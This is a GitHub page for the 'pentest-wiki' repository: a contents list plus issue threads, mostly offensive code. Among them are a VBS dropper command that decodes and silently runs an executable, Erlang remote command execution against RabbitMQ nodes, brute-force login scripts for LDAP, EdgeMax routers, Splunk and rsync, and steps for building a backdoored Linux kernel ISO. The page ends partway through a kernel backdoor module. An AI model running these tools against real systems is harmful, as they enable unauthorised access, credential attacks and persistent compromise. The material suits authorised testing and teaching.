nixawk / pentest-wiki Goto Github PK

PENTEST-WIKI is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others.

License: MIT License

Python 97.00% Groovy 3.00%

pentest security hacking

pentest-wiki's Introduction

Authors: < nixawk >, < m1guelpf >, < binarymist >

is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others.

- Network Analysis
  - IP
  - Whois
  - DNS
  - Identify Live Hosts
  - IDS/IPS Identification
- Web Application
  - Web Application Fingerprint
  - CMS Identification
  - Open Source Analysis
  - IDS/IPS Identification
- OSINT
  - GHDB
  - People
  - Pictures
  - Media
  - Company
  - Document
- Vulnerability Scanners
- Network Assessment
- Web Application Assessment
  - OWASP CheatSheetSeries
- Database Assessment
  - MongoDB
  - MySQL
  - Postgresql
  - Sqlite
- Mobile Assessment
- OS Assessment
  - Mac OSX
&
- Network Exploitation
  - Vulnerable Ports List
  - Cisco ASA CVE-2016-6366
- OS Exploitation
  - Windows
- Web Exploitation
- Database Exploitation
- Wireless Exploitation
- Social Engineering
- Physical Exploitation
- Open Source Exploitation
- Password Attacks
- Privilege Escalation Media
  - Windows Privilege Escalation Fundamentals
  - Basic Linux Privilege Escalation
- Protocol Analysis
- Spoofing Analysis
- OS Backdoors
- Tunneling
- Web Backdoors
- Public pentesting reports
- Flick
- Nebula
- NullByte-1
- FTP
- HTTP

How to contribute

Check for open issues or open a fresh issue to start a discussion around a feature idea or a bug.
Fork the repository on GitHub to start making your changes to the master branch (or branch off of it).
Send a pull request and bug the maintainer until it gets merged and published.

pentest-wiki's People

Contributors

Stargazers

Watchers

Forkers

3mrgnc3 jijicanyu rickgray wflk llovoll manning23 caijiji shengxinking allen-smith wucaishi dshtanger thanatoskira secforks 0x554simon chance-vi c0ntr01 ra0mb1er endliang joyscode ccstuck tinymagicka evilhat xiadr mel0day bird0ntheway androiddream catcherman sjas b5710547221 beelives cyber-forensic getcode2git bingtanguan alberthchang hackmycontrolsystem blueroutecn ovens untenduplicate thisiseast songofhack murthysagi xiaofengtongxue ztencmcp bahtiyarb-torba ptkrm kthemis 0xa-saline h1d3r jerusalemsbell blackjackz xnianq xieqiwen1993 key20 p3t3rp4rk3r mustafaogdur axpatito hpxpat whtn123 ph34n6x cutso binarymist cshuwei buckshotwhoami olivierh59500 paran0ids0ul pekita1 jack51706 sha4p3y3 markart angry7panda redr2e tdyhacker aoshee namansandhu wiswat kbahaxor he-who-is-him newaynewlife av1080p v1cker krodyx dloveshorses rootsecurity gronau-it-cloud-computing hakbak forbidden-ali phongptn93 0x1bitcrack3r mhaggis aancw ycloub blkstone smt1821 mrlobic annibuliful z3v2cicidi hanbinglengyue andyndev demonsec666 animeshshaw

pentest-wiki's Issues

[information gathering] How to collect https certificate info ?

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Author: Nixawk

"""
$ python2.7 https.py www.yahoo.com

{'algorithm': 'sha256WithRSAEncryption',
 'dns': [('DNS', '*.www.yahoo.com'),
         ('DNS', 'www.yahoo.com'),
         ('DNS', 'add.my.yahoo.com'),
         ('DNS', 'au.yahoo.com'),
         ('DNS', 'be.yahoo.com'),
         ('DNS', 'br.yahoo.com'),
         ('DNS', 'ca.my.yahoo.com'),
         ('DNS', 'ca.rogers.yahoo.com'),
         ('DNS', 'ca.yahoo.com'),
         ('DNS', 'ddl.fp.yahoo.com'),
         ('DNS', 'de.yahoo.com'),
         ('DNS', 'en-maktoob.yahoo.com'),
         ('DNS', 'espanol.yahoo.com'),
         ('DNS', 'es.yahoo.com'),
         ('DNS', 'fr-be.yahoo.com'),
         ('DNS', 'fr-ca.rogers.yahoo.com'),
         ('DNS', 'frontier.yahoo.com'),
         ('DNS', 'fr.yahoo.com'),
         ('DNS', 'gr.yahoo.com'),
         ('DNS', 'hk.yahoo.com'),
         ('DNS', 'hsrd.yahoo.com'),
         ('DNS', 'ideanetsetter.yahoo.com'),
         ('DNS', 'id.yahoo.com'),
         ('DNS', 'ie.yahoo.com'),
         ('DNS', 'in.yahoo.com'),
         ('DNS', 'it.yahoo.com'),
         ('DNS', 'maktoob.yahoo.com'),
         ('DNS', 'malaysia.yahoo.com'),
         ('DNS', 'my.yahoo.com'),
         ('DNS', 'nz.yahoo.com'),
         ('DNS', 'ph.yahoo.com'),
         ('DNS', 'qc.yahoo.com'),
         ('DNS', 'ro.yahoo.com'),
         ('DNS', 'se.yahoo.com'),
         ('DNS', 'sg.yahoo.com'),
         ('DNS', 'tw.yahoo.com'),
         ('DNS', 'uk.yahoo.com'),
         ('DNS', 'us.yahoo.com'),
         ('DNS', 'verizon.yahoo.com'),
         ('DNS', 'vn.yahoo.com'),
         ('DNS', 'yahoo.com'),
         ('DNS', 'za.yahoo.com'),
         ('DNS', '*.amp.yimg.com'),
         ('DNS', 'mbp.yimg.com')],
 'issuer': [('C', 'US'),
            ('O', 'DigiCert Inc'),
            ('OU', 'www.digicert.com'),
            ('CN', 'DigiCert SHA2 High Assurance Server CA')],
 'notAfter': '20180319120000Z',
 'notBefore': '20170920000000Z',
 'serialnumber': 16672385189819202335591988329175294739L,
 'subject': [('C', 'US'),
             ('ST', 'CA'),
             ('L', 'Sunnyvale'),
             ('O', 'Yahoo! Inc.'),
             ('CN', '*.www.yahoo.com')]}
"""

from requests.packages.urllib3.contrib import pyopenssl as reqs


class HTTPS(object):

    def __init__(self):
        pass

    def load_remote_certificate(self, host, port):
        return reqs.OpenSSL.crypto.load_certificate(
            reqs.OpenSSL.crypto.FILETYPE_PEM,
            reqs.ssl.get_server_certificate((host, port))
        )

    def parse_remote_certificate(self, host, port):
        cert = self.load_remote_certificate(host, port)
        dns = reqs.get_subj_alt_name(cert)

        # [('C', 'US'),
        #  ('O', 'DigiCert Inc'),
        #  ('OU', 'www.digicert.com'),
        #  ('CN', 'DigiCert SHA2 High Assurance Server CA')]
        issuer = cert.get_issuer().get_components()

        # [('C', 'US'),
        #  ('ST', 'CA'),
        #  ('L', 'Sunnyvale'),
        #  ('O', 'Yahoo! Inc.'),
        #  ('CN', '*.www.yahoo.com')]
        subject = cert.get_subject().get_components()

        notBefore = cert.get_notBefore() # '20170920000000Z'
        notAfter = cert.get_notAfter() # '20180319120000Z'

        # pubkey = cert.get_pubkey()
        # pubkey.bits()
        # pubkey.type()

        serialnumber = cert.get_serial_number()
        algorithm = cert.get_signature_algorithm()
        # cert.get_version()

        record = {
            "issuer": issuer,
            "subject": subject,
            "notBefore": notBefore,
            "notAfter": notAfter,
            "serialnumber": serialnumber,
            "algorithm": algorithm,
            "dns": dns
        }

        return record


if __name__ == '__main__':
    from pprint import pprint
    import sys, os

    argc = len(sys.argv)
    if argc == 2:
        host = sys.argv[1]
        port = 443
    elif argc == 3:
        host = sys.argv[1]
        port = int(sys.argv[2])
    else:
        print("[*] python %s <host> <port, default: 443>" % os.path.basename(sys.argv[0]))
        sys.exit(1)

    https = HTTPS()
    try:
        dns = https.parse_remote_certificate(host, port)
    except Exception as err:
        print(err)
        dns = {}

    pprint(dns)

Trying to generate the vbs payload in telnet but failing

I'm on telnet server and using runas I'm interacting with the admin shell (cmd.exe) with this command
`

C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c echo shellcode = WScript.Arguments.Item(0):strXML = ^"^^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir) > C:\Users\Security\msf2.vbs"`

this is creating an empty vbs file I have tested with normal files it works, I believe its the escape characters which is breaking the command, please suggest what can i do in this context thank you

[bruteforce] rabbitmq

default creds:

guest/guest

Try to access http://target.com:15672/ with your browser, and login with the creds. If it is on, please disable it with the following method.

$ rabbitmq-plugins disable rabbitmq_management
The following plugins have been disabled:
  rabbitmq_management_visualiser
  cowlib
  cowboy
  rabbitmq_web_dispatch
  rabbitmq_management_agent
  rabbitmq_management

Applying plugin configuration to rabbit@localhost... stopped 6 plugins.

[database] rabbitmq hacking

Setup an env lab

$ sudo apt-get install rabbitmq-server
$ sudo service rabbitmq-server start
$ sudo rabbitmqctl -q cluster_status

Elang executes os command

os:cmd runs command in sync mode. open_port in async mode.

$ erl
Erlang/OTP 20 [erts-9.2] [source] [64-bit] [smp:1:1] [ds:1:1:10] [async-threads:10] [kernel-poll:false]

Eshell V9.2  (abort with ^G)
1> os:cmd('/usr/bin/id').
"uid=1000(debug) gid=1001(hadoopgroup) groups=1001(hadoopgroup),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)\n"

2> erlang:open_port({spawn, "/bin/pwd > /tmp/testfile"}, [{line,80},exit_status,eof,stderr_to_stdout]).   
#Port<0.385>

3> spawn(fun() ->
   P5 = erlang:open_port({spawn, "/bin/pwd"},
                         [stderr_to_stdout, in, exit_status,
                          binary,stream, {line, 255}]),
   receive {P5, Data} ->
       io:format("Data ~p~n",[Data])
   end
end).

How to exploit remote rabbitmq node


$ erl -sname test
Erlang/OTP 20 [erts-9.2] [source] [64-bit] [smp:1:1] [ds:1:1:10] [async-threads:10] [kernel-poll:false]

Eshell V9.2  (abort with ^G)
(test@debug-x)1>

> net_kernel:connect('test@debug-x').
true

> [[----Payload Start

erlang:spawn('test@debug-x', fun() ->
   P5 = erlang:open_port({spawn, "/bin/pwd"},
                         [stderr_to_stdout, in, exit_status,
                          binary,stream, {line, 255}]),
   receive {P5, Data} ->
       io:format("Data ~p~n",[Data])
   end
end).

----Payload End]]

Data {data,{eol,<<"/home/debug">>}}

> init:stop().
ok

Reference

[bruteforce] LDAP Login

#!/usr/bin/python
# -*- coding: utf-8 -*-

# $ pip install --user python-ldap


import ldap
import ldapurl
import logging
import getpass


logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__file__)


def ldap_login(username, password, host, port=389, urlscheme='ldap'):

    #    SSL : ldaps://example.com:636/
    #  NOSSL : ldap://example.com:389/

    status = False

    try:
        u = ldapurl.LDAPUrl(
            urlscheme=urlscheme,
            hostport='%s:%d' % (host, int(port))
        )

        l = ldap.initialize(u.unparse())
        
        # perform a synchronous bind
        l.set_option(ldap.OPT_REFERRALS, 0)

        # you should  set this to ldap.VERSION2 if you're using a v2 directory
        l.protocol_version = ldap.VERSION3  
        # Pass in a valid username and password to get 
        # privileged directory access.
        # If you leave them as empty strings or pass an invalid value
        # you will still bind to the server but with limited privileges.
        
        # Any errors will throw an ldap.LDAPError exception 
        # or related exception so you can ignore the result

        l.simple_bind_s(username, password)
        l.unbind()

        # Return True if ldap allows anonymous binds.

        status = True  # If no exceptions, login status is succeful.

    # except ldap.LDAPError as e:
    except Exception as e:
        log.exception(e)
        # handle error however you like

    if status:
        log.info("%s:%d / %s:%s - Login ldap successfully" % (
            host, int(port), username, password
        ))
    else:
        log.info("%s:%d / %s:%s - Login ldap failed" % (
            host, int(port), username, password
        ))

    return status


if __name__ == '__main__':

    username = input('Username: ')
    password = getpass.getpass()

    ldaphost = "8.8.8.8"    # Ldap Server IP

    ldap_login(username, password, ldaphost)


## References

# https://www.python-ldap.org/en/latest/
# http://www.grotan.com/ldap/python-ldap-samples.html

Typo

On https://github.com/nixawk/pentest-wiki/blob/master/1.Information-Gathering/How-to-gather-dns-information.md 'Category' is spelled 'Categroy' on the OSINT table.

[bruteforce] Edge router (EdgeMax / EdgeOS) login

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Keywords    : EdgeMax, EdgeOS
# Censys dork : "CN=UBNT Router UI"

import requests
import logging


requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning
)

logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger(__file__)


# /var/www/python/edgeos_gui/views.py -- [def login():]

'''
def login():
    """
    Login view - check username and password, require accepting of EULA if it
    has not been accepted yet.
    """
    username = request.POST.get("username")
    password = request.POST.get("password")
    response = auth(username, password)
    success = response.get("success", "0") == "1"

    session = request.environ['beaker.session']
    if success:
        session['error'] = None
        eula_pending = ubnt.is_eula_pending()
        eula_accepted = request.POST.get("accept-eula") == "on"
        if eula_pending and not eula_accepted:
            session['error'] = "Please accept the Terms of Use"
        else:
            if eula_accepted:
                ubnt.accept_eula()
            session.regenerate_id()
            session['authenticated'] = True
            session['ip'] = request.environ.get("REMOTE_ADDR")
            session['username'] = username
            session['level'] = response.get("level")
            session['started'] = response.get("started")
            session['features'] = response.get("platform")
            session['model'] = response.get("platform", {}).get("model")
            # Redirect back to '/' and set session cookie
            res = bottle.response.copy(cls=HTTPResponse)
            res.status = 303
            res.body = ""
            res.set_header("Location", urljoin(request.url, "/"))
            res.set_cookie("X-CSRF-TOKEN", csrf.generate_csrf_token())
            res.set_cookie("PHPSESSID", session.id)  # TODO: PHPSESSID, srsly...
            raise res
    else:
        session['error'] = response.get("error", "Unexpected error during authentication")
    redirect("/")
'''

def edgemax_login(host, port=443, username="ubnt", password="ubnt", timeout=30):
    '''Read more from https://www.ubnt.com/download/edgemax
    '''

    '''
    GET / HTTP/1.1
    Host: 192.168.1.100
    User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/58.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0

    ----

    HTTP/1.1 200 OK
    X-Frame-Options: SAMEORIGIN
    X-Xss-Protection: 1; mode=block
    Content-Length: 8482
    X-Content-Type-Options: nosniff
    Content-Type: text/html; charset=UTF-8
    Set-cookie: beaker.session.id=0ae1617e024a4beda6ec6f8fe1a2a83c; httponly; Path=/; secure
    Connection: close
    Date: Thu, 15 Mar 2018 08:02:42 GMT
    Server: Server
    '''

    scheme = "https" if (port == 443) else "http"
    url = "{scheme}://{host}:{port}".format(
        scheme=scheme, host=host, port=port
    )

    headers = {"User-Agent": "Mozilla/5.0 Gecko/20100101 Firefox/58.0"}
    # httpcli = requests.Session()

    # 1. request [beaker.session.id] from edge router
    log.debug("send 1st http request for [beaker.session.id]")

    response = requests.get(
        url, verify=False,
        headers=headers,
        allow_redirects=False,
        timeout=timeout
    )

    beaker_session_id = response.cookies.get('beaker.session.id', '')
    if not beaker_session_id:
        return False

    '''
    POST / HTTP/1.1
    Host: 192.168.1.100
    User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/58.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://192.168.1.100/
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 27
    Cookie: beaker.session.id=0ae1617e024a4beda6ec6f8fe1a2a83c
    Connection: close
    Upgrade-Insecure-Requests: 1

    username=ubnt&password=ubnt

    ----

    HTTP/1.1 303 See Other
    Content-Length: 0
    Location: https://192.168.1.100/
    Content-Type: text/html; charset=UTF-8
    Set-Cookie: PHPSESSID=409ada3f2434439a9a852678efbd728e
    Set-Cookie: X-CSRF-TOKEN=c9ff9d757c989b97ffb223fbe2194ea994f247150acd8134aaeabbebf80228dc
    Set-Cookie: beaker.session.id=409ada3f2434439a9a852678efbd728e; httponly; Path=/; secure
    Connection: close
    Date: Thu, 15 Mar 2018 08:04:11 GMT
    Server: Server
    '''

    # 2. login with username/password and [beaker.session.id]
    headers = {
        "User-Agent": "Mozilla/5.0 Gecko/20100101 Firefox/58.0",
        "Cookie": "beaker.session.id=%s" % beaker_session_id
    }

    log.debug("send 2nd http request to login EdgeMax with creds")

    response = requests.post(
        url,
        verify=False,
        headers=headers,
        timeout=timeout,
        allow_redirects=False,
        data={"username": username, "password": password},
    )

    cookie_authenticated_flag = all(
        [
            _ in response.cookies
            for _ in ['PHPSESSID', 'X-CSRF-TOKEN', 'beaker.session.id']
        ]
    )

    status = (response.status_code == 303) and cookie_authenticated_flag

    if status:
        log.info("Login %s:%s (%s/%s) successfully" % (
            host, port, username, password
        ))
    else:
        log.info("Login %s:%s (%s/%s) failed" % (
            host, port, username, password
        ))

    return status


if __name__ == "__main__":
    import sys

    if len(sys.argv) != 3:
        print("python %s <host> <port>" % sys.argv[0])
        sys.exit(0)


    host = sys.argv[1]      # "192.168.1.100"
    port = int(sys.argv[2]) # 443

    edgemax_login(host, port)


## References

# https://www.ubnt.com/download/edgemax

$ python2.7 edgemax_login.py
DEBUG:edgemax_login.py:send 1st http request for [beaker.session.id]
DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): 192.168.1.100
DEBUG:urllib3.connectionpool:https://192.168.1.100:443 "GET / HTTP/1.1" 200 8482
DEBUG:edgemax_login.py:send 2nd http request to login EdgeMax with creds
DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): 192.168.1.100
DEBUG:urllib3.connectionpool:https://192.168.1.100:443 "POST / HTTP/1.1" 303 0
INFO:edgemax_login.py:Login 192.168.1.100:443 (ubnt/ubnt) successfully

Pentest wiki

[privilege escalation] Windows Kernel Exploitation

Download: Windows Kernel Exploitation.pdf. If you like, please add a reference url for pentest-wiki.

#!/usr/bin/python
# -*- coding: utf-8 -*-

# pip2 install --user splunk-sdk

import splunklib.binding as binding
import logging


logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__file__)


def splunk_login(host, port, username, password):
    """Login Splunk based on API.
    """
    login_status = False
    try:
        service = binding.connect(
            host=host, port=port,
            username=username, password=password)

        login_status = True
        log.info("Attempting %s:%d - Login successfully" % (host, port))

    except binding.AuthenticationError as e:
        log.info("Attempting %s:%d - %s" % (host, port, e.message))

    return login_status


if __name__ == '__main__':

    host = "splunklab.example.com"
    port = 8089
    username = "username"
    password = "password"

    splunk_login(host, port, username, password)


"""
$ python2 splunk_login.py
INFO:splunk_login.py:Attempting splunklab.example.com:8089 - Login failed.

$ python2 splunk_login.py
INFO:splunk_login.py:Attempting splunklab.example.com:8089 - Login successfully

"""

[Maintaining Access] How to create a iso with backdoor ?

add a backdoor driver into kernel-source

You can try to use other methods to backdoor the linux. (not driver)

~/Projects/kernelbuild/linux-5.0.3 ➭ zcat /proc/config.gz > .config
~/Projects/kernelbuild/linux-5.0.3 ➭ ll drivers/backdoor
total 12K
-rw-r--r-- 1 debug debug 3.3K Mar 22 16:41 backdoor.c
-rw-r--r-- 1 debug debug   94 Mar 22 16:57 Kconfig
-rw-r--r-- 1 debug debug   37 Mar 22 17:01 Makefile

~/Projects/kernelbuild/linux-5.0.3 ➭ make
...
  AR      drivers/backdoor/built-in.a
...

~/Projects/kernelbuild/linux-5.0.3 ➭ ll drivers/backdoor
total 16K
-rw-r--r-- 1 debug debug 3.3K Mar 22 16:41 backdoor.c
-rw-r--r-- 1 debug debug    8 Mar 22 17:23 built-in.a
-rw-r--r-- 1 debug debug   94 Mar 22 16:57 Kconfig
-rw-r--r-- 1 debug debug   37 Mar 22 17:01 Makefile
-rw-r--r-- 1 debug debug    0 Mar 22 17:23 modules.order

~/Projects/kernelbuild/linux-5.0.3 ➭  cat drivers/backdoor/Makefile
obj-$(CONFIG_BACKDOOR) += backdoor.o

~/Projects/kernelbuild/linux-5.0.3 ➭  cat drivers/backdoor/Kconfig
config BACKDOOR
	tristate "backdoor module"
	# depends on ARM
	help
		this is a backdoor module

~/Projects/kernelbuild/linux-5.0.3 ➭ grep backdoor drivers/Kconfig
source "drivers/backdoor/Kconfig"
~/Projects/kernelbuild/linux-5.0.3 ➭ grep backdoor drivers/Makefile
obj-y                           += backdoor/

create a iso

If you are a archer, archiso is a good choice.

references

[bruteforce] rsync

#!/usr/bin/python
# -*- coding: utf-8 -*-

"""\
This module provides rsync operations and some related functions.

Functions:

Rsync.client_negotiate() -- recv rsync welcome/motd messages
Rsync.client_initialisation() -- send rsync VERSION query
Rsync.client_query() -- send rsync query string
Rsync.client_command() -- send rsync command string
Rsync.bruteforce() -- bruteforce a rsync server with username/password
Rsync.rsync_list() -- list a rsync server
Rsync.generate_challenge() -- read challenge string from rsync response
Rsync.generate_hash() -- generate password hash with password and challenge


Usages:

    $ python2.7 rsync.py mirrors.tripadvisor.com

    [{'comment': 'https://www.centos.org', 'name': 'centos'},
     {'comment': 'https://www.centos.org', 'name': 'centos-vault'},
     {'comment': 'https://www.ubuntu.com', 'name': 'ubuntu'},
     {'comment': 'https://www.ubuntu.com', 'name': 'releases'},
     {'comment': 'https://www.archlinux.org', 'name': 'archlinux'},
     {'comment': 'https://www.gnu.org', 'name': 'gnu'}]

    $ python2.7
    Python 2.7.13 (default, Jan 19 2017, 14:48:08)
    [GCC 6.3.0 20170118] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import rsync
    >>> rsync_client = rsync.Rsync("192.168.1.100", 873)
    >>> rsync_client.rsync_list()
    >>> rsync_client.modules_list
    [{'comment': 'The documents folder of Juan', 'name': 'code'}]
    >>> rsync_client.bruteforce("root", "password")
    True
    
"""

__author__  = "Nixawk"
__license__ = "GNU license"
__classes__ = ["RSYNC", "RSYNC_EXCEPTION"]

__all__     = [
    "bruteforce",
    "rsync_list",
    "rsync_auth"
]


import logging
import socket
import hashlib
import base64


logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger(__name__)


SOCKET_TIMEOUT = 8.0
SOCKET_READ_BUFFERSIZE = 1024


class RSYNC_EXCEPTION(Exception):
    """Custom Rsync Exception"""
    pass


class Rsync(object):

    """
    $ ncat -v mirrors.tripadvisor.com 873
    Ncat: Version 7.00 ( https://nmap.org/ncat )
    Ncat: Connected to 199.102.235.174:873.
    @RSYNCD: 30.0
    @RSYNCD: 30.0
    #list
    centos          https://www.centos.org
    centos-vault    https://www.centos.org
    ubuntu          https://www.ubuntu.com
    releases        https://www.ubuntu.com
    archlinux       https://www.archlinux.org
    gnu             https://www.gnu.org
    @RSYNCD: EXIT
    """

    MAGIC_HEADER     = '@RSYNCD:'
    HEADER_VERSION   = ''

    RSYNC_EXIT       = '@RSYNCD: EXIT'
    RSYNC_AUTH_REQ   = '@RSYNCD: AUTHREQD'
    RSYNC_AUTH_OK    = '@RSYNCD: OK'

    def __init__(self, host, port):
        """class __init__ method"""
        self.rsync_host = host  # remote rsync service host
        self.rsync_port = port  # remote rsync service port
        self.rsync_sock = None  # python socket object
        self.connections = []
        self.modules_list = []

    def __enter__(self):
        """support context manager"""
        self.connect()
        self.connections.append(self.rsync_sock)

        return self

    def __exit__(self, *exc):
        """support context manager"""
        self.rsync_sock = self.connections.pop()
        self.disconnect()

    def connect(self):
        """connect to rsync server"""
        self.rsync_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.rsync_sock.settimeout(SOCKET_TIMEOUT)
        self.rsync_sock.connect((self.rsync_host, self.rsync_port))

    def disconnect(self):
        """disconnect from rsync server"""
        self.rsync_sock.close()
        self.rsync_sock = None

    def read(self):
        """receive data from rsync server"""
        data = ''
        try:
            while True:
                _ = self.rsync_sock.recv(SOCKET_READ_BUFFERSIZE)
                if not _: break
                data += _
        except Exception as err:
            pass
        return data

    def write(self, data):
        """send data to rsync server"""
        self.rsync_sock.send(data)

    def client_negotiate(self):
        """receive rsync welcome message"""
        data = self.read()

        if not data:
            raise RSYNC_EXCEPTION("rsync client recvs no response")

        if not (self.MAGIC_HEADER in data):
            raise RSYNC_EXCEPTION("rsync client recvs error protocol")

        # [data] examples:

        # '@RSYNCD: 30.0\n'

        # "@RSYNCD: 31.0\nWelcome to the ftp-stud.hs-esslingen.de archives.\n\nIf have any unusual problems, please report them via e-mail to\[email protected].\n\n  All transfers are logged.\n  If you don't like this policy, then disconnect now.\n  This server does not support --checksum (-c)\n  This server does not support --compress (-z)\n\n\n"

        ver, motd = data.split("\n", 1)

        _, self.HEADER_VERSION = ver.split(" ", 1)
        if not self.HEADER_VERSION:
            raise RSYNC_EXCEPTION("rsync client fails to recv rsync version")

    def client_initialisation(self):
        """send rsync file rsynchroniser query"""
        rsync_file_rsynchroniser = [
            self.MAGIC_HEADER,
            self.HEADER_VERSION,
            "\n"
        ]
        rsync_file_rsynchroniser = "".join(rsync_file_rsynchroniser)
        self.write(rsync_file_rsynchroniser)

    def client_query(self, data):
        """send query string to rsync server"""
        self.write(data)

    def client_command(self, data):
        """send command string to rsync server"""
        self.write(data)

    def rsync_list(self):
        """list all records from rsync server"""
        # $ ncat -v mirrors.tripadvisor.com 873
        # Ncat: Version 7.00 ( https://nmap.org/ncat )
        # Ncat: Connected to 199.102.235.174:873.
        # @RSYNCD: 30.0
        # @RSYNCD: 30.0

        # centos          https://www.centos.org
        # centos-vault    https://www.centos.org
        # ubuntu          https://www.ubuntu.com
        # releases        https://www.ubuntu.com
        # archlinux       https://www.archlinux.org
        # gnu             https://www.gnu.org

        self.connect()
        self.client_negotiate()
        self.client_initialisation()
        self.client_query("\n")

        raw = self.read()  # [@RSYNCD: EXIT]
        if not raw:
            raise RSYNC_EXCEPTION("rsync client fails to list records")

        lines = raw.split("\n")
        for line in lines:
            if not (line and "\t" in line): continue
            name, comment = line.split("\t", 1)
            name = name.strip()
            module_info = {
                "name": name,
                "comment": comment
            }

            self.modules_list.append(module_info)

        self.disconnect()

    def bruteforce(self, username, password):
        """bruteforce rsync server with creds"""
        self.rsync_list()
        for module_list in self.modules_list:
            if self.rsync_auth(username, password, module_list['name']):
                return True

        return False

    def generate_challenge(self, data):
        """generate challenge string from rsync response"""

        # Line 59, From rsync/authenticate.c, original:
        # void gen_challenge(const char *addr, char *challenge)

        # '@RSYNCD: 31.0\n@RSYNCD: AUTHREQD qUah8Knxn+k1k9LINf4fkg\n'
        challenge = filter(
            lambda x: self.RSYNC_AUTH_REQ in x,
            data.split("\n"))

        if not challenge:
            raise RSYNC_EXCEPTION("fails to recv rsync challenge response")

        challenge = challenge[0]
        challenge = challenge.replace(self.RSYNC_AUTH_REQ, "")
        challenge = challenge.strip()

        return challenge

    def generate_hash(self, password, challenge):
        """generate rsync password hash"""

        # Line 83, From rsync/authenticate.c, original:
        # void generate_hash(const char *in, const char *challenge, char *out)

        md5 = hashlib.md5()
        md5.update(password)
        md5.update(challenge)
        md5.digest()

        pwdhash = base64.b64encode(md5.digest())  # 'NCjPJpWP7VPP2dO7X0jhrw=='
        pwdhash = pwdhash.rstrip('==')

        return pwdhash

    def rsync_auth(self, username, password, modulename):
        """access a rsync module with creds"""

        # $ ncat -v 10.97.214.6 873
        # Ncat: Version 7.00 ( https://nmap.org/ncat )
        # Ncat: Connected to 10.97.214.6:873.
        # @RSYNCD: 31.0
        # @RSYNCD: 31.0
        # code
        # @RSYNCD: AUTHREQD kPbHY16SUmch6/WhA/4brQ

        # @ERROR: auth failed on module code

        self.connect()  # must reconnect here
        self.client_initialisation()
        self.client_query(modulename + "\n")

        # rsync challenge response (include str)
        rawdata = self.read()

        # no auth require
        # '@RSYNCD: 30.0\n@RSYNCD: OK\n'
        if rawdata and self.RSYNC_AUTH_OK in rawdata:
            return True

        # auth require
        challenge = self.generate_challenge(rawdata)
        pass_hash = self.generate_hash(password, challenge)

        self.client_command("{} {}\n".format(username, pass_hash))
        rawdata = self.read()

        # '@RSYNCD: OK\n'
        # '@ERROR: auth failed on module code\n'
        if rawdata and rawdata.startswith(self.RSYNC_AUTH_OK):
            return True

        self.disconnect()

        return False


if __name__ == "__main__":
    from pprint import pprint
    import sys, os

    argc = len(sys.argv)
    if argc == 2:
        host = sys.argv[1]
        port = 873
    elif argc == 3:
        host = sys.argv[1]
        port = int(sys.argv[2])
    else:
        print("[*] python %s <host> <port, default: 873>" % os.path.basename(sys.argv[0]))
        sys.exit(1)

    rsync = Rsync(host, port)
    rsync.rsync_list()
    pprint(rsync.modules_list)



# References
# https://www.rfc-editor.org/rfc/rfc5781.txt
# https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/rsync/modules_list.rb
# http://rsync.samba.org/ftp/rsync/rsync.html
# https://rsync.samba.org/how-rsync-works.html
# https://github.com/rapid7/metasploit-framework/pull/6178
# https://www.wireshark.org/docs/dfref/r/rsync.html
# https://github.com/boundary/wireshark/blob/master/epan/dissectors/packet-rsync.c

Books for pentesters

Please view the books list page. If you want to share a good book, please paste the following information here.

[Maintaining Access] Linux Kernel Backdoor

#include <linux/module.h>
#include <linux/uaccess.h>
#include <linux/proc_fs.h>
#include <linux/cred.h>
#include <linux/slab.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("security");
MODULE_DESCRIPTION("Just for educational purpose");

#define KERN_PERMBITS 0666   // permission bits -> /proc/mod/bdm
#define KERN_PROCROOT "mod"
#define KERN_PROCFILE "bdm"
#define KERN_PASSWORD "password"

static ssize_t mymodule_write(struct file *, const char __user *, size_t, loff_t *);
static ssize_t mymodule_read(struct file *, char __user *, size_t, loff_t *);
static int mymodule_open(struct inode *, struct file *);
static int mymodule_procfs_attach(void);
static int __init mymodule_init(void);
static void __exit mymodule_exit(void);

static struct proc_dir_entry *proc_root;
static struct proc_dir_entry *proc_file;
static const struct file_operations proc_fops = {
        .open= mymodule_open,
        .read= mymodule_read,
        .write = mymodule_write,
};

static ssize_t
